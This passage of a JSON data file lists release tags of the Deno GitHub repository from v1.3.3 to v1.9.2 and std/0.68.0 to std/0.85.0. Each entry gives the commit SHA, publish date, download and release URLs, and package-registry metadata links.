tml_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms